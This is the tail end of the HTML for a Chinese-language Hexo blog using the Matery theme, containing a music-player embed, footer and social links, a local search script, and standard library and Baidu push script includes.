                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script>

    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2020-2021</span>
            
            <span id="year">2020</span>
            <a href="/about" target="_blank">obelia</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
                &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                        class="white-color">13.8k</span>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/obelia01" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:obelia.0708@gmali.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tg://obelia0708/" class="tooltipped" target="_blank" data-tooltip="通过TG联系我" data-position="top" data-delay="50">
        <i class="fab fa-telegram"></i>
    </a>









</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
